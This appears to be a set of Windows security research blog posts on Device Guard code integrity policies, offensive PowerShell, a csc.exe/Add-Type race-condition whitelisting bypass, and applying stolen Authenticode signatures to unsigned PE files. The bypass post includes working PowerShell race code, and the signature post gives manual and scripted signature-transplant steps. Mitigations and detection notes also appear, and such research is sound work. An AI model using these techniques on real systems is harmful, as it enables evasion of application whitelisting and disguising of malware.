  3. After I felt confident that I had a good driver whitelist, I placed the policy into enforcement mode and rebooted. What resulted was nonstop boot failures. It turns out that if you're whitelisting individual drivers, critical drivers like ntoskrnl.exe and hal.dll won't show up in the event log in audit mode. So I explicitly added rules for them and Nano Server still wouldn't boot. What made things worse is that even when I placed the policy back into audit mode, there were no new blocked driver entries, but the system still refused to boot. I rolled the dice and posited that there might be an issue with certificate chain validation at boot time, so I created a PCACertificate rule for ntoskrnl.exe (the "Microsoft Code Signing PCA 2010" rule). This miraculously did the trick at the expense of creating a more permissive policy. In the end, I ended up with roughly the equivalent of a Publisher ruleset on my drivers with the exception of my Intel NIC driver.
  4. I explicitly made a FilePublisher rule for my Intel NIC driver as it was the only 3rd party, non-OEM driver I had to add when creating my Nano Server image. I don't need to allow any other code signed by Intel, so I explicitly allow only that one driver.
  5. After I got Nano Server to boot, I started working on user-mode rules. This process was relatively straightforward and I used the Publisher rule for user-mode code.
  6. After using Nano Server in audit mode with my new rule set and not seeing any legitimate binaries that would have been blocked, I felt confident in the policy and placed it into enforcement mode. I haven't run into any issues since, and I'm using Nano Server as a Hyper-V server (i.e. with the "Compute" package).
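For reference, resizing the operational event log (mentioned in step 1) is a one-liner with the built-in wevtutil utility; 20 MB is expressed in bytes:

wevtutil sl Microsoft-Windows-CodeIntegrity/Operational /ms:20971520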
I still need to get around to adding my code-signing certificate as an authorized policy signer, signing the policy, and removing "Enabled:Unsigned System Integrity Policy". Overall though, despite the driver issues, I'm fairly content with how well locked down my policy is. It essentially allows only a subset of critical Microsoft code to execute, with the exception of the Intel driver, which has a very specific file/signature-based rule.

Conclusion

I'm not sure if we'll see improved code integrity or Device Guard support for Nano Server in the future, but something is at least better than nothing. As it stands though, if you are worried about the execution of untrusted PowerShell code, unfortunately, UMCI does nothing to protect you on Nano Server. Code integrity still does a great job of blocking untrusted compiled binaries though - a hallmark of the vast majority of malware campaigns. Nano Server opens up a whole new world of possibilities from a management and malware perspective. I'm personally very interested to see how attackers will try to evolve and support their operations in a Nano Server environment. Fortunately, the combination of Windows Defender and code integrity support offer a solid security baseline.

Updating Device Guard Code Integrity Policies

In previous posts about Device Guard, I spent a lot of time talking about initial code integrity (CI) configurations and bypasses. What I haven't covered until now, however, is an extremely important topic: how does one effectively install software and update CI policies accordingly? In this post, I will walk you through how I got Chrome installed on my Surface Book running with an enforced Device Guard code integrity policy.

The first questions I posed to myself were:
  1. Should I place my system into audit mode, install the software, and base an updated policy on CodeIntegrity event log entries?
  2. Or should I install the software on a separate, non-Device Guard-protected system, analyze the file footprint, develop a policy based on the installed files, deploy, and test?
My preference is option #2 as I would prefer not to place a system back into audit mode if I can avoid it. That said, audit mode would yield the most accurate results as it would tell you exactly which binaries would have been blocked - precisely those you would want to base whitelist rules on. In this case, there's no right or wrong answer. My decision to go with option #2 was to base my rules solely off binaries that execute post-installation, not during installation. My mantra with whitelisting is to be as restrictive as is reasonable.

So how did I go about beginning to enumerate the file footprint of Chrome?
  1. I opened Chrome, ran it as I usually would, and used PowerShell to enumerate loaded modules.
  2. I also happened to know that the Google updater runs as a scheduled task so I wanted to obtain the binaries executed via scheduled tasks as well.
I executed the following to get a rough sense of where Chrome files were installed:

(Get-Process -Name *Chrome*).Modules.FileName | Sort-Object -Unique
(Get-ScheduledTask -TaskName *Google*).Actions.Execute | Sort-Object -Unique

To my surprise and satisfaction, Google manages to house nearly all of its binaries in C:\Program Files (x86)\Google. This allows for a great starting point for building Chrome whitelist rules.

Next, I had to ask myself the following:
  1. Am I okay with whitelisting anything signed by Google?
  2. Do I only want to whitelist Chrome? i.e. All Chrome-related EXEs and all DLLs they rely upon.
  3. I will probably want Chrome to be able to update itself without Device Guard getting in the way, right?
While I like the idea of whitelisting just Chrome, there are going to be some potential pitfalls. By whitelisting just Chrome, I would need to be aware of every EXE and DLL that Chrome requires to function. I can certainly do that, but it would be a relatively work-intensive effort. With that list, I would then create whitelist rules using the FilePublisher file rule level. This would be great initially, and it would potentially be the most restrictive strategy while allowing Chrome to update itself. The issue is: what happens when Google decides to include one or more additional DLLs in the software installation? Device Guard will block them and I will be forced to update my policy again. I'm all about applying a paranoid mindset to my policy, but at the end of the day, I need to get work done other than constantly updating CI policies.

So the whitelist strategy I choose in this instance is to allow code signed by Google and to allow Chrome to update itself. This strategy equates to using the "Publisher" file rule level - "a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA (such as Symantec), but only if the leaf certificate is from a specific company (such as Intel, for device drivers)."

I like the "Publisher" file rule level because it offers the most flexibility and longevity for a specific vendor's code signing certificate. If you look at the certificate chain for chrome.exe, you will see that the issuing PCA (i.e. the issuer above the leaf certificate) is Symantec. Obviously, we wouldn't want to whitelist all code signed by certs issued by Symantec, but I'm okay allowing code signed by Google, who received their certificate from Symantec.

Certificate chain for chrome.exe
So now I'm ready to create the first draft of my code integrity rules for Chrome.

I always start by creating a FilePublisher rule set for the binaries I want to whitelist because it allows me to see which binaries are tied to their respective certificates.

$GooglePEs = Get-SystemDriver -ScanPath 'C:\Program Files (x86)\Google' -UserPEs
New-CIPolicy -FilePath Google_FilePub.xml -DriverFiles $GooglePEs -Level FilePublisher -UserPEs

What resulted was the following ruleset. Everything looked fine except for a single Microsoft rule that was generated for d3dcompiler_47.dll. I looked in my master rule policy and I already had this rule. Being obsessive-compulsive, I wanted a pristine ruleset consisting of only Google rules. This is good practice anyway once you get in the habit of managing large whitelist rulesets: keep separate policy XMLs for each whitelisting scenario you run into and then merge accordingly. After removing the MS binary from the list, what resulted was a much cleaner ruleset (Publisher applied this time) consisting of only two signer rules.

$OnlyGooglePEs = $GooglePEs | ? { -not $_.FriendlyName.EndsWith('d3dcompiler_47.dll') }
New-CIPolicy -FilePath Google_Publisher.xml -DriverFiles $OnlyGooglePEs -Level Publisher -UserPEs

So now, all I should need to do is merge the new rules into my master ruleset, redeploy, reboot, and if all works well, Chrome should install and execute without issue.

$MasterRuleXml = 'FinalPolicy.xml'
$ChromeRules = New-CIPolicyRule -DriverFiles $OnlyGooglePEs -Level Publisher
Merge-CIPolicy -OutputFilePath FinalPolicy_Merged.xml -PolicyPaths $MasterRuleXml -Rules $ChromeRules
ConvertFrom-CIPolicy -XmlFilePath .\FinalPolicy_Merged.xml -BinaryFilePath SIPolicy.p7b
# Finally, on the Device Guard system, replace the existing
# SIPolicy.p7b with the one that was just generated and reboot.

One thing I neglected to account for was the initial Chrome installer binary. I could have incorporated the binary into this process, but I wanted to try my luck and see whether Google used the same certificates to sign the installer. Luckily, they did, and everything installed and executed perfectly. I would consider myself lucky in this case because I selected a software publisher (Google) that employs decent code signing practices.

Conclusion

In future blog posts, I will document my experiences deploying software that doesn't adhere to proper signing practices or doesn't even sign their code. Hopefully, the Google Chrome case study will, at a minimum, ease you into the process of updating code integrity policies for new software deployments.

The bottom line is that this isn't an easy process. Are there ways in which Microsoft could improve the code integrity policy generation/update/deployment/auditing experience? Absolutely! Even if they did though, the responsibility ultimately lies on you to make informed decisions about what software you trust and how you choose to enforce that trust!

PowerShell is Not Special - An Offensive PowerShell Retrospective

“PowerShell is not special.”

During Jared Haight’s excellent DerbyCon presentation, he uttered this blasphemous sentence. As someone who has invested the last five years of his life learning and mastering PowerShell, at a surface level, it was easy to dismiss such a claim. However, I’ve done a lot of introspection about my investment in offensive PowerShell, and the more I thought about it, the more I began to realize that PowerShell really isn’t that special! Before you bring out the torches and pitchforks, allow me to apply context.

My first exposure to PowerShell was from Dave Kennedy and Josh Kelley during their DEF CON presentation – PowerShell OMFG. Initially, I considered PowerShell to be amusing from a security perspective. I was just getting my start in infosec, however, and I had a lot of other things that I needed to focus on. Not long after that talk, Chris Campbell (@obscuresec) took a keen interest in PowerShell and heavily advocated that we start using it on our team. My obsession with PowerShell wasn’t solidified until I realized that it could be used as a shellcode runner. Once it sank in that there really wasn’t anything PowerShell couldn’t do, my interest in and promotion of offensive PowerShell took off.

For years, I did my part in developing unique offensive capabilities in PowerShell to the approval of many in the community and to the disappointment of defenders and employees of Microsoft. At the time, their disappointment and frustration was justified to an extent. When I started writing offensive PowerShell code, v3 hadn’t been released so the level of detection was laughable. Fast forward to now – PowerShell v5 (which is available downlevel to Windows 7). I challenge anyone to identify a single language – scripting, interpreted, compiled, or otherwise that has better logging than PowerShell v5. Additionally, if defenders choose to employ whitelisting to enforce trusted PowerShell code, both AppLocker and Device Guard do what many still (mistakenly) believe the execution policy was intended to do – actually perform signature enforcement of PowerShell code.
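For defenders wanting to cash in on that logging, scriptblock logging can be enabled outside of Group Policy via the standard policy registry key. A minimal sketch:

$Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $Key -Force | Out-Null
Set-ItemProperty -Path $Key -Name EnableScriptBlockLogging -Value 1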

While PowerShell has become extremely popular amongst pentesters, red teamers, criminals, and state-sponsored actors, let’s not forget that we’re still getting compromised by compiled payloads every... freaking... day. PowerShell really is just a means to an end in achieving an attacker’s objective - now at the cost of generating significant noise with the logging offered by PowerShell v5. PowerShell obviously offers many distinct advantages for attackers that I highlighted years ago, but defenders and security vendors are slowly but surely catching up with detecting PowerShell attacks. Additionally, with the introduction of AMSI, for all of its flaws, we now have AV engines that can scan arbitrary buffers in memory.

So in the context of offense, this is why I say that PowerShell really isn’t special. Defenders truly are armed with the tools they need to detect and mitigate PowerShell attacks. So the next time you find yourself worrying about PowerShell attacks, make sure you’re worrying equally, if not more, about every other kind of payload that could execute on your system. Don’t be naïve, however, and write PowerShell off as a “solved problem.” There will always be innovative bypass/evasion research in the PowerShell space. Let’s continue to bring this to the public’s attention, and the community will continue to benefit from the fruits of offensive and defensive research.

References for securing/monitoring PowerShell:

Bypassing Device Guard with .NET Assembly Compilation Methods

Tl;dr

This post will describe a Device Guard user mode code integrity (UMCI) bypass (or a bypass of any other application whitelisting solution, for that matter) that takes advantage of the fact that code integrity checks are not performed on any code that is compiled dynamically from C# with csc.exe. This issue was reported to Microsoft on November 14, 2016. Despite all other Device Guard bypasses being serviced, a decision was made to not service this bypass. This bypass can be mitigated by blocking csc.exe, but that may not be realistic in your environment considering the frequency with which legitimate code makes use of these methods - e.g. msbuild.exe and many PowerShell modules that call Add-Type.

Introduction

When Device Guard enforces user mode code integrity (UMCI), aside from blocking non-whitelisted binaries, it also only permits the execution of signed scripts (PowerShell and WSH) approved per policy. The UMCI enforcement mechanism in PowerShell is constrained language mode. One of the features of constrained language mode is that unsigned/unapproved scripts are prevented from calling Add-Type, as this would permit arbitrary code execution via the compilation and loading of supplied C#. Scripts that are approved per Device Guard code integrity (CI) policy, however, are under no such restrictions, execute in full language mode, and are permitted to call Add-Type. While investigating Device Guard bypasses, I considered targeting legitimate, approved calls to Add-Type. I knew that the act of calling Add-Type caused csc.exe (the C# compiler) to drop a .cs file to %TEMP%, compile it, and load it. A procmon trace of PowerShell calling Add-Type confirms this:

Process Name Operation  Path
------------ ---------  ----
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.cmdline
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.0.cs
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP
cvtres.exe   CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\RES1A69.tmp
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\bfuswtq5.dll
csc.exe      CreateFile C:\Users\TestUser\AppData\Local\Temp\CSC3FBE068FE0A4C00B4A74B718FAE2E57.TMP

Upon seeing these files created, I asked myself the following questions:
  1. Considering an approved (i.e. whitelisted per policy) PowerShell function is permitted to call Add-Type (as many Microsoft-signed module functions do), could I possibly replace the dropped .cs file with my own? Could I do so quickly enough to win that race?
  2. How is the .DLL that’s created loaded? Is it subject to code integrity (CI) checks?

Research methodology

Let's start with the second question since exploitation would be impossible if CI prevented the loading of a hijacked, unsigned DLL. To answer this question, I needed to determine what .NET methods were called upon Add-Type being invoked - a determination made relatively easy by tracing method calls in dnSpy. The Microsoft.CSharp.CSharpCodeGenerator.Compile method is where csc.exe is ultimately invoked. After the Compile method returns, FromFileBatch takes the compiled artifacts, reads them in as a byte array, and then loads them using System.Reflection.Assembly.Load(byte[], byte[], Evidence). This is the same method called by msbuild.exe when compiling inline tasks - a known Device Guard UMCI bypass discovered by Casey Smith. Knowing this, I gained the confidence that if I could hijack the dropped .cs file, I would end up having a constrained language mode bypass, allowing arbitrary unsigned code execution. What we're referring to here is known as a "time of check time of use" (TOCTOU) attack. If I could manage to replace the dropped .cs file with my own prior to csc.exe consuming it, then I would win that race and perform the bypass. The only constraint imposed on me would be that I would need to write a hijack payload within the limits of constrained language mode. As it turns out, I was successful.

Exploitation

I wrote a function called Add-TypeRaceCondition that will accept attacker-supplied C# and get an allowed call to Add-Type to compile it and load it within the constraints of constrained language mode. The weaponized bypass is roughly broken down as follows:
  1. Spawn a child process of PowerShell that constantly tries to drop the malicious .cs file to %TEMP%.
  2. Maximize the process priority of the child PowerShell process to increase the likelihood of winning the race.
  3. In the parent PowerShell process, import a Microsoft-signed PowerShell module that calls Add-Type - I chose the PSDiagnostics module for this.
  4. Kill the child PowerShell process.
  5. At this point, you will have likely won the race and your type will be loaded in place of the legitimate one expected by PSDiagnostics.
In reality, the payload wins the race a little more than 50% of the time. If Add-TypeRaceCondition doesn’t work on the first try, it will almost always work on the second try.
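To make the race concrete, here is a minimal sketch of those steps - not the actual Add-TypeRaceCondition implementation. The class name, file filter, and paths are illustrative, and the child-process quoting is kept simple for readability:

# Stage the malicious C# that will be swapped in for the legitimate .cs file
Set-Content -Path "$env:TEMP\payload.cs" -Value @'
public class Hijacked {
    public static string ToString(string inputString) { return inputString; }
}
'@

# 1) Spawn a child PowerShell that constantly stomps any dropped .cs file
$RacerCommand = 'while ($true) { Get-ChildItem $env:TEMP -Filter *.0.cs -ErrorAction Ignore | ForEach-Object { Copy-Item (Join-Path $env:TEMP payload.cs) $_.FullName -ErrorAction Ignore } }'
$Racer = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList '-Command', $RacerCommand

# 2) Maximize priority to increase the odds of winning the race
$Racer.PriorityClass = 'High'

# 3) Trigger a legitimate, signed Add-Type call
Import-Module PSDiagnostics -Force

# 4) Kill the racer; if the race was won, the hijacked type is now loaded
Stop-Process -Id $Racer.Id
[Hijacked]::ToString('arbitrary unsigned code execution')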

Do note that while I weaponized this bypass for PowerShell, this can be weaponized using anything that would allow you to overwrite the dropped .cs file quickly enough. I've weaponized the bypass using a batch script, VBScript, and with WMI. I'll leave it up to the reader to implement a bypass using their language of choice.

Operational Considerations

It's worth noting that while an application whitelisting bypass is just that, it also serves as a method of code execution that is likely to evade defenses. In this bypass, an attacker need only drop a C# file to disk which results in the temporary creation of a DLL on disk which is quickly deleted. Depending upon the payload used, some anti-virus solutions with real-time scanning enabled could potentially have the ability to quarantine the dropped DLL before it's consumed by System.Reflection.Assembly.Load.

Prevention

Let me first emphasize that this is a .NET issue, not a PowerShell issue. PowerShell was simply chosen as a convenient means to weaponize the bypass. As I’ve already stated, this issue doesn’t just apply to when PowerShell calls Add-Type, but when any application calls any of the CodeDomProvider.CompileAssemblyFrom methods. Researchers will continue to target signed applications that make such method calls until this issue is mitigated.

A possible user mitigation for this bypass would be to block csc.exe with a Device Guard rule. I would personally advise against this, however, since there are many legitimate Add-Type calls in PowerShell and presumably in other legitimate applications. I’ve provided a sample Device Guard CI rule that you can merge into your policy if you like though. I created the rule with the following code:

# Copy csc.exe into the following directory.
# csc.exe should be the only file in this directory.
$CSCTestPath = '.\Desktop\ToBlock\'
$PEInfo = Get-SystemDriver -ScanPath $CSCTestPath -UserPEs -NoShadowCopy

$DenyRule = New-CIPolicyRule -Level FileName -DriverFiles $PEInfo -Deny
$DenyRule[0].SetAttribute('MinimumFileVersion', '65535.65535.65535.65535')

$CIArgs = @{
    FilePath = "$($CSCTestPath)block_csc.xml"
    Rules = $DenyRule
    UserPEs = $True
}

New-CIPolicy @CIArgs

Detection

Unfortunately, detection using free, off-the-shelf tools will be difficult because the disk artifacts are created and subsequently deleted, and because System.Reflection.Assembly.Load(byte[]) does not generate a traditional module load event that something like Sysmon would be able to detect.

Vendors with the ability to hash files on the spot should consider assessing the prevalence of DLLs created by csc.exe. Files with low prevalence should be treated as suspicious. Also, unfortunately, since dynamically created DLLs by their nature will not be signed, there will be no code signing heuristics to key off of.

It's worth noting that I intentionally didn't mention PowerShell v5 ScriptBlock logging as a detection option since PowerShell isn't actually required to achieve this bypass.

Conclusion

I remain optimistic of Device Guard’s ability to enforce user mode code integrity. It is a difficult problem to tackle, however, and there is plenty of attack surface. In most cases, Device Guard UMCI bypasses can be mitigated by a user in the form of CI blacklist rules. Unfortunately, in my opinion, no realistic user mitigation of this particular bypass is possible. Microsoft not servicing such a bypass is the exception and not the norm. Please don’t let this discourage you from reporting any bypasses that you may find to secure@microsoft.com. It is my hope that by releasing this bypass that it will eventually be addressed and it will provide other vendors with the opportunity to mitigate.

Previously serviced bypasses for reference:

Application of Authenticode Signatures to Unsigned Code

Attackers have been known to apply legitimate digital certificates to their malware, presumably to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods by which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques describing the application of digital certificates to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

Background


What does it mean for a PE file (exe, dll, sys, etc.) to be signed? The simple answer to many is to open up the file properties on a PE and if a “Digital Signatures” tab is present, it means it was signed. When you see that the “Digital Signatures” tab is present on a file, it actually means that the PE file was Authenticode signed, which means within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash which doesn’t consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


Many files that one would expect to be signed, however, (for example, consider notepad.exe) do not have a “Digital Signatures” tab. Does this mean that the file isn’t signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just a list of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to lookup catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}
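Since the Explorer UI won't surface a catalog signature, a quick way to see one in action is to validate notepad.exe from PowerShell, trimming the output to the relevant properties:

Get-AuthenticodeSignature -FilePath C:\Windows\System32\notepad.exe |
    Select-Object Status, SignatureType, IsOSBinary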


In the above output, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

sigcheck -q -h -i C:\Windows\System32\notepad.exe
c:\windows\system32\notepad.exe:
  Verified:       Signed
  Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat
  Signers:
    Microsoft Windows
      Status:         Valid
      Valid Usage:    NT5 Crypto, Code Signing
      Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06
      Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     1:39 PM 10/11/2016
      Valid to:       1:39 PM 1/11/2018
    Microsoft Windows Production PCA 2011
      Status:         Valid
      Valid Usage:    All
      Serial Number:  61 07 76 56 00 00 00 00 00 08
      Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D
      Algorithm:      1.2.840.113549.1.1.11
      Valid from:     11:41 AM 10/19/2011
      Valid to:       11:51 AM 10/19/2026
    Microsoft Root Certificate Authority 2010
                Status:         Valid
                Valid Usage:    All
                Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A
                                9B 58 6B 43 39 AA
                Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
                Algorithm:      1.2.840.113549.1.1.11
                Valid from:     2:57 PM 6/23/2010
                Valid to:       3:04 PM 6/23/2035
    Signing date:   1:02 PM 3/18/2017
    Counter Signers:
      Microsoft Time-Stamp Service
        Status:         Valid
        Valid Usage:    Timestamp Signing
        Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3
        Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     10:56 AM 9/7/2016
        Valid to:       10:56 AM 9/7/2018
      Microsoft Time-Stamp PCA 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  61 09 81 2A 00 00 00 00 00 02
        Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:36 PM 7/1/2010
        Valid to:       2:46 PM 7/1/2025
      Microsoft Root Certificate Authority 2010
        Status:         Valid
        Valid Usage:    All
        Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA
        Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5
        Algorithm:      1.2.840.113549.1.1.11
        Valid from:     2:57 PM 6/23/2010
        Valid to:       3:04 PM 6/23/2035
    Publisher:      Microsoft Windows
    Description:    Notepad
    Product:        Microsoft® Windows® Operating System
    Prod version:   10.0.15063.0
    File version:   10.0.15063.0 (WinBuild.160101.0800)
    MachineType:    64-bit
    MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A
    SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA
    PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E
    PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E
    SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA
    IMP:    645E8D8B0AEA808FF16DAA70D6EE720E

Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:



Digital Signature Binary Format


Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
  1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
  2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data.
It is worth spending time exploring all of the fields contained within a digital signature. All fields present are outside of the scope of this blog post, however. Additional crypto/signature-related OIDs are listed here.
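If you'd rather not paste signature data into an online decoder, certutil can dump ASN.1 structures locally. For example, against the catalog file from the earlier sigcheck output:

certutil -asn C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat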

Embedded PE Authenticode Signature Retrieval


The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


The offset and size of the embedded digital signature is stored in the “security directory” offset within the “data directories” array within the optional header. The data directory contains offsets and size of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual offsets (RVA) meaning they are the offset to the respective portion of the PE when loaded in memory. There is one exception though - the security directory which stores its offset as a file offset. The reason for this is because the Windows loader doesn’t actually load the content of the security directory in memory.
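To make that concrete, here is a minimal PowerShell sketch of reading the security directory entry straight from the headers. It assumes a 64-bit (PE32+) image:

$Bytes = [IO.File]::ReadAllBytes('C:\Windows\System32\kernel32.dll')
$e_lfanew = [BitConverter]::ToInt32($Bytes, 0x3C)        # offset of the 'PE\0\0' signature
$OptionalHeader = $e_lfanew + 4 + 20                     # skip the PE signature and file header
# The data directory begins 112 bytes into a PE32+ optional header. The security
# directory is entry index 4 and each entry is a DWORD offset plus a DWORD size.
$SecurityEntry = $OptionalHeader + 112 + (4 * 8)
$SigOffset = [BitConverter]::ToUInt32($Bytes, $SecurityEntry)    # a file offset, not an RVA
$SigSize = [BitConverter]::ToUInt32($Bytes, $SecurityEntry + 4)
'Offset: 0x{0:X8}, Size: 0x{1:X8}' -f $SigOffset, $SigSize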

The binary data at the security directory file offset is a WIN_CERTIFICATE structure. Here’s what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):


PE Authenticode signatures should always have a wCertificateType of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn’t find the 1.3.6.1.4.1.311.12.1.1 OID, indicating the presence of catalog hashes.

Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:


Application of Digital Signatures to Unsigned PEs


Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

Application of Embedded Authenticode Signatures


Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


Step #5: Open HelloWorld.exe in CFF Explorer and update the security directory to point to the digital signature that was applied: offset - 0x00000E00, size - 0x00003A68. Save the file after making the modifications. Ignore the “Invalid” warning. CFF Explorer doesn’t treat the security directory as a file offset and gets confused when it tries to reference what section the data resides in.


That’s it! Now, signature validation utilities will parse and display the signature properly. The only caveat is that they will report that the signature is invalid because the calculated Authenticode of the file does not match that of the signed hash stored in the certificate.
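If you would rather script steps 1 through 5, here is a hedged sketch of the full signature transplant. PE32+ is assumed for both files, and the paths are illustrative:

function Get-SecurityDirectoryEntryOffset ([byte[]] $Bytes) {
    $e_lfanew = [BitConverter]::ToInt32($Bytes, 0x3C)
    $e_lfanew + 4 + 20 + 112 + (4 * 8)   # data directory entry #4 in a PE32+ optional header
}

$Donor = [IO.File]::ReadAllBytes('C:\Windows\System32\kernel32.dll')
$Target = [IO.File]::ReadAllBytes('C:\Test\HelloWorld.exe')

# Extract the donor's WIN_CERTIFICATE blob
$DonorEntry = Get-SecurityDirectoryEntryOffset $Donor
$SigOffset = [BitConverter]::ToUInt32($Donor, $DonorEntry)
$SigSize = [BitConverter]::ToUInt32($Donor, $DonorEntry + 4)
$SigBytes = $Donor[$SigOffset..($SigOffset + $SigSize - 1)]

# Point the target's security directory at the blob we're about to append
$TargetEntry = Get-SecurityDirectoryEntryOffset $Target
[BitConverter]::GetBytes([UInt32] $Target.Length).CopyTo($Target, $TargetEntry)
[BitConverter]::GetBytes([UInt32] $SigSize).CopyTo($Target, $TargetEntry + 4)
[IO.File]::WriteAllBytes('C:\Test\HelloWorld_signed.exe', [byte[]] ($Target + $SigBytes))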


